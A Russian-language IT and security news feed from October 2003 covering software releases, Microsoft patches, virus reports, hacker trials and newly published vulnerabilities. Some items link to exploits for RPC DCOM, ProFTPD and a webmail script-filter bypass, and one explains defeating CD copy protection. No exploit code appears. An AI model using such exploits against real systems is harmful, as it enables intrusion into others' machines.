На нижегородском сайте ЗАРАЗы, посвящённом сетевой безопасности опубликован ещё один эксплоит, использующий уязвимость в RPC DCOM. Сделан для платформы win32. Там же помещён исходный код универсального шелл-кода для этой уязвимости на Ассемблере. Эксплоит - http://www.security.nnov.ru/files/rpcdcom3.c Шелл-код - http://www.security.nnov.ru/files/unshell.asm
8/10/2003 14:57 Отчёт ALT Linux об участии в SoftTool2003.
На сайте команды ALT Linux опубликован отчёт об участии в выставке SoftTool2003. Как сообщают разрабочтки, за 5 дней выставленный для взлома сервер под управлением ALT Linux Master 2.2 так и не был взломан (мы сообщали об объявлении этого конкурса ранее). Особый интерес, думается у посетителей нашего сайта может вызвать выложенный на сайт файл .bash_history. :))) Подробности - http://www.altlinux.ru/index.php?module=softool2003
8/10/2003 13:02 Вышел Blin 1.3 (Gnome2 Edition) в малоформатном исполнении.
Как сообщается на linux.org.ru, вышла версия 1.3 Blin Linux. Blin - проект по созданию универсального дистрибутива операционной системы GNU/Linux. Система размещаемая на компакт-диске не требует дополнительной установки на жесткий диск и работает прямо с CD. Сразу после запуска, пользователь получает настроенную, готовую к работе в графическом режиме среду. BLin выгодно отличается от существующих аналогов качественной поддержкой кириллицы и оригинальным подходом к компоновке. Гибкие механизмы формирования дистрибутива позволяют создавать заказные системы, учитывающие предпочтения конкретных пользователей. Подробнее - http://blin.zp.ua/v_13_livecd3_gnome.shtml
8/10/2003 12:45 Защита документов от Hitachi встраивается в шрифты.
Новая технология от Hitachi может положить конец неавторизированным копиям документов. Как сообщает издание The Inquirerсо ссылкой на Nihon Keizai Shimbun, методика использует 64-битный секретный код, который может быть вставлен в предложение длиной в 60-70 символов. Код добавляется к шрифтам и незаметен при чтении, однако может быть обнаружен при использовании специального ПО и сканера. Подобная техника уже используется для защиты полноцветных фото и графических изображений, однако Hitachi впервые смогла применить ее к черно-белому тексту. Новость должна обрадовать не только секретные госдепартаменты, но и многие высокотехнологичные компании, которые обычно крайне недовольны просачиванием коммерческих сведений в средства массовой информации. Источник - http://www.cnews.ru
8/10/2003 12:05 Обновление Sybase.
Sybase сообщила о выходе СУБД Adaptive Server Enterprise 12.5.1, особенностями которой являются поддержка функций самоуправления и Web-служб. В числе первых - возможность исполнения по расписанию пакетных заданий, включая резервное копирование, а также автоматическое распределение памяти и управление свободным пространством. Среди функций, относящихся к Web-службам, - работа с данными формата XML, поддержка языка запросов XQuery и возможность экспозиции хранимых процедур в виде Web-служб. Источник - http://www.osp.ru
8/10/2003 11:41 Новое семейство антивирусов от Panda Software.
Компания Panda Software объявляет о расширении ассортимента своих программ и представляет новое семейство продуктов, нацеленное на удовлетворение требований к информационной безопасности даже самых взыскательных пользователей и компаний, вне зависимости от их размера и направления деятельности. Для домашних пользователей будет предназначен Titanium Antivirus 2004. Для квалифицированных домашних пользователей, малых предприятий и профессионалов Panda Software представляет новый продукт Platinum Internet Security, включающий в себя совокупность технологий для борьбы с угрозами, исходящими из Интернета. Для удовлетворения потребностей ключевого рыночного сектора - малых компаний и компаний среднего размера, компания Panda Software разработала пакет BusinesSecure - высокоэффективное техническое решение для защиты от всех видов вирусов, троянов и червей автоматизированных рабочих мест (АРМ) и файловых служб. Другой новый пакет - EnterpriSecure - обеспечивает полную и автоматическую защиту корпоративных сетей. Глобальная антивируснсая защита, предлагаемая этим решением, гарантирует, что все составляющие сети - АРМ, электронная почта, Интернет-шлюзы, ДМЗ-сервисы и т.д. - будут вне досягаемости для вредоносных кодов. Подробности и цены - http://www.viruslab.ru/press/index.php?go=show&num=197
8/10/2003 11:33 Суд ЮАР выпустил компьютерного грабителя под залог в 1,5 тысячи долларов.
Решением южноафриканского суда на свободу под залог в 10 тысяч рандов (около 1,5 тыс. долларов) отпущен Йоханнес Якобус Фурье (Johannes Jacobus Fourie), подозреваемый в хакерских атаках на "Объединенные банки Южной Африки" (Absa). По данным обвинения, используя компьютерные сети Absa, Фурье совершил 55 хищений денежных средств на общую сумму в 500 тысяч рандов (примерно 73 тыс. долларов). По словам адвоката подозреваемого Питера Михалика (Peter Mihalik), единственным препятствием для освобождения Фурье под залог было предположение обвинителей о том, что, оказавшись на свободе, хакер вновь начнет совершать компьютерные кражи. Михалик отметил, что его клиент пока не признан виновным. В свою очередь, члены следственной группы сообщили, что Фурье продолжал совершать кражи даже после того, как полиция официально обвинила его подозреваемым в преступлении. К словам полицейских присоединился и прокурор Энтони Стивен (Anthony Stephen). Он рассказал, что первым владельцем банковской карты, пострадавшим от деяний Фурье, стал отец подозреваемого. Стивен напомнил, что по совокупности инкриминируемых деяний отпущенному под залог хакеру грозит до 15 лет лишения свободы. Хищения по схеме Фурье может совершить практически каждый пользователь компьютера и даже телефона, считает прокурор. Источник - http://www.viruslist.com
8/10/2003 10:30 Защита от копирования CD снимается клавишей Shift.
Еще одно подтверждение факта о том, что никакая защита не является абсолютной. По сообщению Reuters, некто Джон Холдермен, выпускник Принстонского университета, нашел способ нейтрализовать MediaMax CD3 - новое программное обеспечение, предназначенное для защиты аудио-CD от копирования при помощи компьютера. Способ на удивление прост: он заключается в удерживании клавиши Shift, нажатие которой не позволяет операционным системам семейства Windows автоматически запускать криптографическую программу на CD. Холдермен также сообщает, что защиту можно снять и еще одним способом - извлечением из привода аудиодиска во время инсталляции с него драйвера данной криптопрограммы (инсталляция запускается автоматически, после первой же загрузки диска в дисковод). На системах, отличных от Windows, такое защитное ПО не работает в принципе. Холдермен, ранее занимавшийся исследованиями в области защиты от копирования, заявляет, что любые попытки защитить контент музыкальных CD при помощи дополнительного программного обеспечения могут нейтрализовываться не менее легко. Защита, осуществленная при помощи допонительных аппаратных средств, может привести к появлению проблем несовместимости и, как следствие, к росту общественного недовольства. Подробнее - http://www.reuters.com/newsArticle.jhtml?type=topNews&storyID=3572929
8/10/2003 10:16 Исправленное обновление для MacOS.
Компания Apple выпустила исправленный вариант обновления операционной системы MacOS 10.2 Jaguar до версии 10.2.8, сообщает компьюлента. Первый вариант этого обновления увидел свет в сентябре, но вскоре был отозван из-за проблем с совместимостью с некоторыми компьютерами серии PowerMac G4. Наиболее серьезная из ошибок приводила к исчезновению из системы адаптера для подключения к локальным сетям Ethernet. Изначально пакет обновлений предназначался для установки на компьютеры с процессорами PowerMac G3 и G4. В версии 10.2.8 устранялись некторые недоработки, связанные с работой Bluetooth-устройств и аудиоконтроллера, реализацией поддержки шины USB 2.0, исправлением ошибок при работе с FireWire. Некоторые изменения затронули оболочку Finder и браузер Safari. Одновременно с выходом исправленного обновления Apple опубликовала бюллетень с описанием проблемы. В нем говорится, что проблемы с Ethernet после установки первого варианта обновления могут возникать на компьютерах Power Mac G4 и Macintosh Server G4, где установлены по два процессора с частотой 450 или 500 МГц и контроллер Gigabit Ehternet. Проблемы возникают только при подключении таких компьютеров к некоторым моделям сетевого оборудования с портами 10BASE-T. Единственным предложенным вариантом устранения проблемы является загрузка исправленного обновления. Обновление - http://www.info.apple.com/support/downloads.html
7/10/2003 14:49 NetBSD установка и первоначальная настройка.
Андрей Бешков ака tigrisha в форуме sysadmins.ru (respect;))опубликовал на сайте opennet.ru первую статью из серии стаатей, посвящённых обзору ОС NetBSD. Посвящена она, естественно, самому первому этапу в изучении любой ОС - установке и конфигурировании. Cтатья - http://onix.opennet.ru/netbsd/netbsd.html
7/10/2003 13:24 Эксплоит уязвимости ProFTPD.
Господин bkbll из китайской команды Cnhonker опубликовал эксплоит уязвимости, обнаруженной ранее X-force в адресе возврата фуннкции _xlate_ascii_write. Эксплоит, по описанию, позволяет удалённо получить рута в версиях 1.2.7/1.2.9rc2. Исходник - http://www.cnhonker.com/index.php?module=articles&act=view&type=6&id=152
7/10/2003 13:01 Microsoft внесет изменения в IE по решению суда.
Представители Microsoft подтвердили, что компания собирается внести изменения в Windows и Internet Explorer согласно требованиям суда, признавшего нарушения компанией патентов, принадлежащих Eolas. В 1999 году Eolas предъявил Microsoft иск о нарушении принадлежащих им патентов на технологию плагинов в браузере IE, который использует эту технологию для работы с ActiveX, Java и другими модулями. Разрешение этого дела было весьма важно не только для Microsoft, но и для других компаний, занимающихся интернет-браузерами, такими как Mozilla, Netscape, Opera и Safari, поскольку все они используют технологию плагинов. По словам представителей Microsoft, изменения в IE будут внесены к началу следующего года. Компания обеспечит разработчиков документацией, которая поможет в разработке схемы принципиально иного отображения веб-страниц с использованием Adobe Reader, Apple QuickTime, Macromedia Flash, RealNetworks RealOne, Java и Windows Media Player. Также Microsoft собирается добиваться пересмотра решения суда, которое обязывает компанию выплатить $520 млн. за нарушение патентов. Компания надеется доказать, что никакого нарушения не было, а технология плагинов, используемая в IE, была разработана инженерами компании на основе старых технологий Microsoft. Источник - http://www.cnews.ru
7/10/2003 12:28 Symantec прогнозирует рост угроз от "сетевых червей".
По результатам исследования состояния дел в сфере информационной безопасности, проведенного специалистами компании Symantec, можно сделать вывод о том, что распространение гибридных сетевых вирусов, сочетающих использование злонамеренного кода и поиск уязвимостей программного обеспечения, остается одной из наиболее значимых проблем, с которыми столкнутся специалисты по безопасности компьютерных сетей в этом году. В первой половине 2003 г. число таких вирусов составило 60% от общего числа, рост составил 20%. Скорость распространения гибридных вирусов также выросла. Например, интернет-червь Slammer заразил компьютеры во всем мире в течение нескольких часов. Более того, один из последних вирусов MS Blaster инфицировал 2500 компьютеров каждый час. Аналитики компании Symantec прогнозируют значительный рост распространения интернет-червей, что приведет к перегрузкам в аппаратных средствах и парализует сетевой трафик. В исследовании отмечается рост числа кибер-атак на 19%. Компания Symantec зарегистрировала 1 тыс. 432 новых интернет-червей (на 12% больше, чем за первую половину 2002 г.), 994 новых Win32-вирусов (что более, чем вдвое превышает прошлогодний уровень). Источник - http://www.oxpaha.ru
7/10/2003 12:12 Возможность обхода JS-фильтрации в некоторх Webmail-системах.
Уязвимость обнаружена в некоторых Webmail системах в комбинации с Microsoft Internet Explorer. Удаленный атакующий может выполнить произвольный код сценария в почтовом HTML сообщении при его просмотре в Webmail системе, в обход существующих механизмов фильтрации. Удаленный атакующий может вставить произвольный javascript код в таблицу стилей через ключевое слово "expression" используя определенную методику, чтобы обойти существующие механизмы фильтрации javascript кода в большинстве Webmail системах. Уязвимость работает только в Microsoft Internet Explorer. Подробности и эксплоит - http://www.securitylab.ru/40609.html
7/10/2003 12:06 Stresslinux 0.2.6.
Stresslinux дистрибутив для проверки железа "на прочность". В состав занимающего в bz2-архиве 17 Мб входят такие утилиты, как stress, CPUBurn, hddtemp, smartmontools, memtest86. В качестве оболочки используется busybox. Stresslinux может стартовать с CD- ROM, USB-диска или загружаться по сети. Источник - linux.org.ru. Подробности - http://www.stresslinux.org/
7/10/2003 11:54 Сети под контролем Web-служб.
В компании Computer Associates International разрабатывается технология удаленного управления корпоративными сетями, которая будет действовать по принципу Web-службы с тарификацией по системе подписки. По словам представителя СА, администраторы сети смогут устанавливать параметры управления при помощи порталоподобного Web-интерфейса. В числе прочего служба будет доставлять обновления и заплаты для программного обеспечения, применяемого в сети фирмы-пользователя. Технология разрабатывается на основе инструментария управления сетями CA UniCenter. Службу планируется выполнить в соответствии со спецификацией WS-Manageability, проходящей процесс стандартизации в ассоциации OASIS. По завершении разработки в СА планируют предлагать технологию для хостинга Internet-провайдерам и аутсорсинговым фирмам. Источник - http:///www.osp.ru
7/10/2003 11:09 IM-черви могут развивать невероятные скорости.
Компьютерный червь, передаваемый через системы обмена сообщениями (Instant Messaging Systems, IM), теоретически может заразить полмиллиона компьютеров за 30 секунд. IM-приложения позволяют пользователям отсылать сообщения в режиме реального времени через интернет. Они стали популярной альтернативой электронной почте среди домашних пользователей и офисных работников. До сих пор не было создано вируса, распространяющегося через IM-системы. Однако специалисты по компьютерной безопасности утверждают, что заражение таких приложений представляет очевидную и очень серьезную угрозу. Специалисты провели ряд тестов и моделирований, благодаря которым удалось установить упомянутый примерный предел скорости распространения вируса по IM-приложениям. В основу тестов было положено время, необходимое для обмена пакетами информации между IM-приложениями и среднее количество пользователей в контакт-листе интернет-пейджера. По словам руководителя научной группы, проводившей исследования, среднее время, которое потребуется IM-червю для инфицирования 500000 машин - 30 секунд. Даже в самом пессимистичном (для червя) сценарии это займет меньше трех минут. На сегодняшний день в IM-клиентах найдено около 60 "дыр", через которые мог бы проникнуть червь. Найти другие машины для заражения червю не составит труда: контакт-лист каждого IM-клиента хранится в незащищенной папке и может быть легко использован. Однако, у IM-сетей есть и определенные способы защиты от такого рода эпидемий. Например, эти сети имеют центральный сервер, на котором происходит вход пользователя в систему и последующий обмен данными с другими пользователями сети. Распространение червя вызовет скачек трафика, который попросту "завалит" сервер, останавливая при этом и эпидемию. Источник - http://www.virslist.ru
7/10/2003 10:45 Недельный отчет о вирусах Panda Software.
Компания Panda Softwarre опубликовала традиционный еженедельный отчёт об вирусной активности прошедшей недели. В отчёте рассмотрены трояны Hatoy.A, Petala.A и шесть версий Istbar, а также трех червей - Dozer.A, Simbag.A и Holar.I. Подробное описание - http://www.viruslab.ru/press/index.php?go=show&num=196
7/10/2003 10:41 Поссорившись с девушкой, английский хакер вывел из строя сервер американского морского порта.
Британский хакер обвиняется в том, что он вывел из строя сервер американского морского порта в Хьюстоне, сообщает BBC News. Слушания по делу 19-летнего Арона Кеффри (Aaron Caffrey) начались в понедельник в королевском суде Саутворка (Southwark Crown Court) в Лондоне. Кеффри, страдающий синдромом Аспергера, редкой формой аутизма, утверждает, что он не намеревался препятствовать работе сервер техасского порта. По его словам, он всего лишь пытался заблокировать компьютер собеседницы по чату, которая неодобрительно высказывалась об американской политике. Для этого ему нужно было послать с разных серверов на компьютер девушки огромное количество бесполезной информации. В числе прочих он воспользовался и портовым сервером. Ранее при задержании Кеффри утверждал, что его подставили другие хакеры, планировавшие атаку на портовый сервер. Окончательный вердикт по делу Кеффри еще не был вынесен. Источник - http://www.lenta.ru
6/10/2003 18:04 Показательный взлом банковской системы.
В городе Дубаи в ОАЭ профессиональный хакер cегодня совершит (или уже совершил) показательный взлом электронной защиты местного банка, сообщает газета "Аль-Баян". Феликс Линднер - немец по происхождению. Он работает в США правительственным консультантом по электронному пиратству. На демонстрации будут присутствовать участники проходящего в Дубаи ближневосточного семинара по борьбе с кибер-преступлениями, который организован эмиратской Академией коммуникаций, а также представители полиции и юристы. В рамках семинара организован первый в арабском мире показательный "суд" над кибер-преступником Феликсом Линднером. Шесть судей и шесть экспертов в области компьютерной безопасности проводят процесс по делу хакера, якобы организовавшего перекачку средств из банка на свои личные счета. "Подсудимый" Линднер продемонстрирует судьям и аудитории типичные хакерские приемы взлома защитной системы сетей, способы доказательств взлома, а также методы выявления уязвимых сторон электронной защиты. ОАЭ первыми из арабских государств внесли в свой уголовный кодекс изменения, касающиеся кибер-преступлений, и уже провели по новому законодательству несколько судебных процессов над хакерами. Источник - http://www.oxpaha.ru
6/10/2003 17:49 PHLAK : Professional Hacker's Linux Assault Kit.
На сайте www.bugtraq.ru cообщается о появлении еще одного дистрибутива Linux, ориентированного на тестирование сетевой защиты на прочность. Как и у RTK, возможна работа непосредственно с CD и, само собой, в комплект входит подборка всевозможных профильных утилит. Cайт проекта - http://www.phlak.org/modules/news/
6/10/2003 17:27 VeriSign закрыл сервис Site Finder.
После скандала, последовавшего после введения сервиса перенаправления пользователей Site Finder, американская интернет-компания VeriSign решила ликвидировать источник споров. Сервис, запущенный 15 сентября, закрыт. В противном случае ICANN лишила бы VeriSign права на управление доменами в зонах .com и .net. Против VeriSign выдвинут коллективный иск. Источник - http://www.cnews.ru
6/10/2003 17:24 Microsoft выпустила исправление для Outlook.
Microsoft выпустил патч для устранения недавно обнаруженной несовместимости между новой версией почтового клиента Outlook и более старой версией почтового сервера Exchange. По словам представителей компании, было получено четыре сообщения о подобных проблемах от клиентов, работавших с версией 5.5 Exchange и бета-версией Outlook 2003. При этом каждый раз почтовый сервер запускал сложный набор правил для сортировки сообщений, что в итоге приводило к замедлению работы сервера и затягиванию обработки сообщений. С начала года было распространено сотни тысяч копий конфликтного почтового клиента. И, хотя в компании считают, что довольно малое число пользователей будет использовать именно такие сложные наборы правил, всем «счастливчикам» рекомендуют обратиться в службу поддержки пользователей Microsoft для получения свежего исправления. Источник - http://www.globetechnology.com/
6/10/2003 17:21 ИТ-специалисты смогут побыть хакерами.
Учебный центр NTC корпорации Uni и компания Domina Security объявили о проведении трех совместных семинаров по информационной безопасности. 16-часовая программа двухдневного тренинга Ethical Hacking Hands-On Course в основном посвящена практике. Каждому его участнику предоставляется в пользование компьютер с несколькими операционными системами и доступом в Internet. Уникальный для России материал семинара позволит слушателям овладеть новыми знаниями и умениями, попробовав себя в качестве "взломщиков", ознакомившись с нетрадиционной точкой зрения на традиционные аспекты информационной безопасности (так называемый lateral thinking), а также поможет на практике поэтапно освоить несколько техник компьютерного взлома как в среде Windows, так и в среде Linux. Таким образом специалисты в области защиты информации смогут глубже понять суть проблем, проистекающих от деятельности хакеров. Подробности треннинга - http://www.oxpaha.ru/view.asp?10239
6/10/2003 17:01 Microsoft намерена интегрировать Windows с BIOS.
В результате соглашения между Microsoft и производителем BIOS — компанией Phoenix Technologies — операционная система сможет непосредственно управлять аппаратурой. Однако это вызывает опасения по поводу того, кто станет контролировать все программное обеспечение в ПК. Microsoft расширила свои отношения с производителем BIOS Phoenix Technologies, заключив соглашение, нацеленное на более тесную интеграцию базовых элементов ПК с операционной системой Windows. Компании уверяют, что в результате их сотрудничества ПК должен стать проще и надежнее. Однако соглашение, вероятно, вызовет негативную реакцию со стороны защитников прав потребителей, так как и Microsoft, и Phoenix участвуют в программе введения в операционную систему и аппаратуру технологии управления цифровыми правами (digital rights management, DRM). Эта технология позволит владельцам авторских прав лучше контролировать то, как владельцы ПК используют ПО и контент, но ее критикуют за ущемление прав потребителей. Phoenix Core System Software (CSS) представляет собой BIOS нового поколения с более тесной интеграцией операционной системы и аппаратуры — для того, в частности, чтобы облегчить системным администраторам дистанционный контроль за конфигурациями своих систем. Microsoft утверждает, что интеграция ведет к появлению более простых и надежных компьютеров, а также, что BIOS нового поколения позволит будущим версиям Windows управлять подключением blade-серверов к системе, не требуя ее остановки. Новая BIOS позволит также лучше следить за несанкционированным подключением устройств к системе. Подробности - http://www.zdnet.ru/?ID=307528
6/10/2003 16:30 Иск к Microsoft по поводу безопасности ставит трудные вопросы.
Судебный иск, обвиняющий Microsoft в небезопасности ее продуктов, открыл новый фронт в борьбе софтверного гиганта с уязвимостью собственного ПО. Поданный в Верховный суд в Лос-Анджелесе гражданский иск возник в тот момент, когда компания признала, что ее расчет на распространение программных поправок с целью устранения проблем безопасности не сработал. В иске говорится, что, не умея защитить свое ПО, Microsoft подвергает заказчиков опасности разглашения их персональных данных. Иск подан от имени жительницы Лос-Анджелеса Мэрси Гамильтон, которая утверждает, что из-за дефекта программы цифровой вор украл ее персональную информацию. В пятницу Microsoft заявила о своем намерении оспаривать этот иск, опираясь на несколько юридических оснований, и отметила, что она вложила в решение проблем значительные ресурсы и прилагает все усилия к тому, чтобы предотвратить ошибки в будущем. «Совершенно очевидно, что Microsoft сделала безопасность своим приоритетом», — сказал представитель компании Шон Сандуолл. Однако эти усилия не смогли предотвратить вал недавних атак, и компания сама планирует объявить на предстоящей неделе новую стратегию, идущую дальше предупреждений заказчиков о необходимости латать свои собственные системы. Подробности - http://zdnet.com.com/2100-1104_2-5086385.html
6/10/2003 16:06 Более 500 японских корпоративных заказчиков RAV переходят на Антивирус Касперского.
"Лаборатория Касперского" объявила о заключении соглашения с компанией Promark (www.promark-inc.com), крупным японским поставщиком решений по ИТ-безопасности, о переводе локальных пользователей антивирусной системы RAV на Антивирус Касперского®. После приобретения технологий RAV корпорацией Microsoft 10 июня 2003 г. разработчик заявил об остановке прямых продаж, дальнейшего развития продуктов и прекращении выпуска обновлений базы данных с сентября 2004 г. Естественно, что это заставило пользователей и распространителей RAV искать альтернативные антивирусные решения. "Лаборатория Касперского" совместно с Promark поставит Unix/Linux антивирусные решения для защиты почтовых серверов более 500 японских заказчиков. В их число входят крупные промышленные предприятия (Nissan, Toyota, Yamaha Diesel, Fuji Business, Sumitomo Metal), производители радиоэлектроники и поставщики информационных технологий (Sony, Sun Microsystems Japan, Hewlett Packard Japan, Yahoo Japan), теле и радиовещательные компании (TBS, телевидение Нагасаки и Окиямы), образовательные (университеты Токио, Киото, Нагои, Осаки) и правительственные учреждения (префектура Нагано). Заказчикам предлагается широкий спектр продуктов для почтовых серверов Unix/Linux, поддерживающих самые распространенные платформы этого семейства. Антивирус Касперского совместим с FreeBSD, OpenBSD, BSDi, Solaris и наиболее популярными дистрибутивами Linux. Продукт готов к интеграции в почтовые шлюзы Sendmail, Qmail, Postfix и Exim и другие серверы приложений. Источник - http://www.kaspersky.ru
6/10/2003 15:39 Хакер взломал сайт телерадиокомпании CBS ради неизвестного кандидата в президенты США.
Сайт американской телерадиокомпании CBS в конце минувшей недели подвергся хакерской атаке. Посетители веб-страницы одной из трех крупнейших вещательных корпораций США в пятницу автоматически перенаправлялись на ресурс, рекламировавший достоинства кандидата в президенты конгрессмена-демократа Денниса Кусинича (Dennis Kucinich), сообщает сайт атакованной компании. В результате пользователи вместо материалов CBS сталкивались с 30-минутным фильмом "Момент настал" (This Is The Moment), в котором Кусинич подробно раскрывал свою политику. "Согласно недавнему опросу, проведеннному CBS, 77% сторонников Демократической партии даже не знают, кто такой Кусинич. Поскольку рассчитывать на то, что средства массовой информации будут распространять сведения о нем, не приходится, я решил им помочь. Пожалуйста, посмотрите это видео и послушайте человека, который вдохновил меня на совершение этого безрассудного поступка", - прокомментировал неизвестный хакер взлом сайта CBS. Представитель штаба, занимающегося организацией избирательной кампании Кусинича, категорически отверг причастность окружения конгрессмена к хакерской атаке на сайт CBS. Согласно результатам социологического опроса, на который ссылался исполнитель взлома веб-страницы, Кусинич - единственный демократический кандидат, не способный победить на выборах Джорджа Буша. Свою поддержку конгрессмену выразил лишь 1% опрошенных. 5% респондентов высказали о нем положительное мнение, 8% - отрицательное и 86% вообще никогда о нем не слышали. Сайт CBS прежде подвергался хакерской атаке в 2000 году. Тогда взломщики разместили на нем текст с критикой Джорджа Буша. Источник - http://www.viruslist.ru
5/10/2003 16:52 Кумулятивный патч для Internet Explorer.
Компания Microsoft выпустила бюллетень по безопасности MS03-40. Помимо исправлений, которые исправлялись предыдущими хотфиксами, включены также исправления для 3-х недавно обнаруженных уязвимостей: некорректной обработки объекта во всплывающем (popup) окне, возвращаемом некторыми Вэб-серверами, некорректной обработки объекта, возвращенного Web сервером в течение связывания XML данных, некорректной обработки метода обработки DHTML. Всем пользователям IE версий 5.01, 5.5, 6.0 и версии 6.0 для Win2003 рекомендуется обновиться. В результате наличия перечисленных уязвимостей удалённый атакующий получает возмжность выполнения кода в Виндоуз-системе. Подробности - http://www.microsoft.com/technet/security/bulletin/MS03-040.asp
5/10/2003 15:47 Выход OverflowGuard.
Paul Webster от имени компании Data Security Software Inc. объявил о выпуска свободной версии персонального пакета OverflowGuard, основное назначение которого - защита известного своей дырявостью IE и всех Active-X компонентов от эксплоитов, вызывающих переполнение буфера в стеке. Свободная версия доступна для скачивания. Сайт проекта - http://www.datasecuritysoftware.com
5/10/2003 15:01 Исходники Half-Life 2 похищены.
Как сообщается на сайте bugtraq.ru, Руководитель разрабатывающей игру Valve Гейб Ньюэлл изложил на сайте Halflife2.net свою версию случившегося. По его словам, похитители действовали по всем правилам хакерской науки. Сначала 11 сентября этого года некто получил доступ к служебному почтовому ящику Ньюэлла и, по всей видимости, оставил троян. Затем 19 сентября кто-то сделал копию директорий, в которых хранились исходники Half-Life 2, а также установил на несколько компьютеров в Valve кейлоггеры. Итогом стало известие о том, что исходники игры можно найти в файлообменных сетях. Одна из главных игр года должна была поступить в продажу еще полторы недели назад, однако в прошлую пятницу издатель, компания Vivendi, объявила о том, что выпуск откладывается на неопределенный срок. Возможно, дело в том, что имея исходники игры, можно сделать версию, жульничающую в мультиплеере. Кроме того, как стало известно из списка рассылки BUGTRAQ, была использована уязвимость в одной из библиотек Outlook, в частности, делались предположения об использовании уязвимостей в quartz.dll и urlmon.dll, при помощи которых Outlook обрабатывает HTML-почту. Тор Лархолм из PivX подтвердил факт кражи исходников и сказал, что были похищены модели движков игры, редакторов уровней и моделей, а также ранние разработки будущей версии Counter-Strike. Подробности - http://www.halflife2.net/forums/showthread.php?...
5/10/2003 14:38 И ещё одна уязвимость в FreeBSD.
Компания Pine Digital Security из Ниделандов, обнаружившая недавно уязвимость в ядре FreeBSD, сообщает о наличии уязвимости ещё в одной из компонент ядра этой ОС. На этот раз уязвимость обнаружена в коде, обеспечивающем работу файловой системы procfs (process file system), которая предназначена для организации работы с системными процессами и демонами. Обычно она монтируется на /proc и используется, например, такими утилитами, как ps и w. В исходном тексте программы procfs_regs.c, которая используется для организации файловой системы, из-за некорректной проверки параметра смещения "uio" возможна ситуация переполнения буфера, которая может привести к тому, что локальный пользователь получает возможность вызвать kernel panic, либо повысить собственные полномочия. Уязвимости подвержены все версии FreeBSD. Командой разработчиков FreeBSD выпущены обновления для всех версий ОС, а также сделаны изменения в репозитарии CVS. Подробности - http://www.pine.nl/press/pine-cert-20030902.txt
5/10/2003 13:21 Установка Oracle9i на Slackware-9.x.
В статье Дмитрия Коптева рассказывается о том, как установить довольно популярную СУБД Oracle версии 9i на ОС Slackware-9.x. Cтатья - http://dimez.nm.ru/docs/oracle
5/10/2003 12:49 Microsoft пропатчила старый Exchange для совместимости с новым Outlook.
Компания Microsoft ликвидировала проблему несовместимости между новым пакетом Outlook 2003 и почтовым сервером Exchange 5.5. Как сообщает CNET News, несколько бета-тестеров пакета Office 2003 пожаловались на проблемы с Exchange 5.5. Как оказалось, в некоторых случаях сервер испытывает перегрузку при обработке сложных запросов, поступающих от Outlook 2003. Эту проблему удалось достаточно оперативно исправить, и в Microsoft уже готов патч, улучшающий совместимость Outlook 2003 с Exchange 5.5. Соответствующее обновление должно в скором времени появиться на сайте Microsoft. Источник - http://www.compulenta.ru
5/10/2003 12:18 Вышла утилита IIS 6.0 Manager для Windows XP.
Компания Microsoft выпустила утилиту для удаленного управления сервером, использующим Internet Informatiom Serveces (ISS) 6.0 с рабочих станций на базе операционной системы Windows XP Professional. При установке IIS 6.0 Manager на компьютер установки полной версии ISS 6.0 не происходит. На рабочей станции появляются только Microsoft Management Console, необходимые для ее работы библиотеки и файлы справки. При этом IIS 6.0 Manager может сосуществовать на одном компьютере с IIS 5.1 Manager. Утилита выпущена только в англоязычной версии. Подробности - http://winxp.bink.nu/BinkPortal/DesktopModules/ArticleDetail.aspx?...
4/10/2003 16:32 Открылся русский сайт о Debian.
Такой симпатичный проект, как Debian определенно достоин большей распространенности в России. Помимо многочисленных материалов о Debian, которых в принципе предостаточно в Рунете, не хватало только собственного сайта на русском языке, где могли бы общаться русскоязычные пользователи и публиковаться новости и документы исключительно по этой операционной системе (как например зарубежные debianplanet.org и debianhelp.org). С этими мыслями был создан сайт "Русский Debian", который официально открылся 2 октября. Сайт - http://debian.linuxrulez.ru/
4/10/2003 15:18 Кросс-платформенная среда разработки Borland C++BuilderX.
На сайте Borland появилась для свободного скачивания 30-дневная версия C++BuilderX - кросс-платформенная среда разработки для C/C++. Версия 1.0 поддерживает компиляторы от Borland, Intel, Microsoft, Sun, GNU и ряд отладчиков на платформах Linux, Windows, Solaris. Реализована на Java(JDK 1.4). Поддержка CVS, кросс-платформенного инсталятора, интеграция с Together(UML) и много чего ещё. Из досадного - вместо иконки BCBX в Linux/Solaris дистрибутиве вложена иконка от JBuilder(что лишний раз говорит о сырости дистрибутива). Новостью и личными впечатлениями поделился azazello с linux.org.ru. Подробности - http://www.linux.org.ru/jump-message.jsp?msgid=...
4/10/2003 14:19 GSM аутентификация для WLAN .
Mobile-review.com сообщает, что компания Interlink Networks объявила о том, что в следующей версии ее RAD-Series AAA (Authentication, Authorization, and Accounting) RADIUS серверов будут поддерживаться средства аутентификации EAP-SIM и EAP-AKA, применяющиеся на данный момент в сетях GSM. На данный момент RADIUS сервера имеют большое распространение в системах аутентификации беспроводных WLAN сетей, использование же в данных решениях стандартов EAP-SIM и EAP-AKA позволит не только предоставить абонентам GSM сетей роуминг в WLAN сетях, но и унифицировать систему схему роуминга WLAN абонентов. В связи с приближающимся массовым выпуском GSM/GPRS/EDGE/WLAN устройств данное или похожие решения могут быть востребованы на рынке уже в самое ближайшее время (первые массовые GSM/WLAN устройства поступят в продажу уже в 2004 году). Источник - http://www.mobile-review.com
4/10/2003 14:03 Всплеск интернет-активности насторожил Symantec.
Неожиданный скачок во всем мире трафика, связанного с серверами доменных имен, может указывать на широкое распространение «троянского коня». Службу безопасности Symantec насторожил резкий скачок во всем мире активности, относящейся к серверам имен доменов. Компания, специализирующаяся на компьютерной безопасности, установила наблюдение за сетевыми портами, связанными с DNS. По словам Винсента Уифера, старшего директора службы Symantec Security Response, датчики межсетевого экрана DeepSight компании начали сообщать о необычно большом количестве сетевых событий, обычно относящихся к деятельности DNS. Похоже, что отчасти беспокойство Symantec вызвано недавним возобновлением деятельности «троянского коня», использующего пробел в защите Microsoft Internet Explorer, который позволяет злоумышленникам вводить произвольный код в Windows-ПК через веб- и HTML-контент. Последняя вариация «троянца» Qhosts-1 манипулирует заложенным в ПК принципом поиска веб-сайтов в интернете. Qhosts-1 меняет параметры настройки ПК на сервер доменных имен — обычно задаваемые интернет-сервис-провайдером пользователя — и направляет его на популярный поисковый сайт, снабжая сетевым адресом, принадлежащим некоему ISP из Техаса. Symantec пока не нашла действительную причину необычного скачка DNS-активности, но ее виновником, по словам Уифера, вполне может быть Qhosts-1. Однако антивирусные компании низко оценивают степень угрозы «троянца», так как о заражении этим вирусом поступает мало сигналов, поэтому Уифер не уверен, что дело именно в нем. «Последний троян (Trojan.Qhosts) может быть частично или полностью причиной всей этой активности, во всяком случае все полученные Symantec образцы 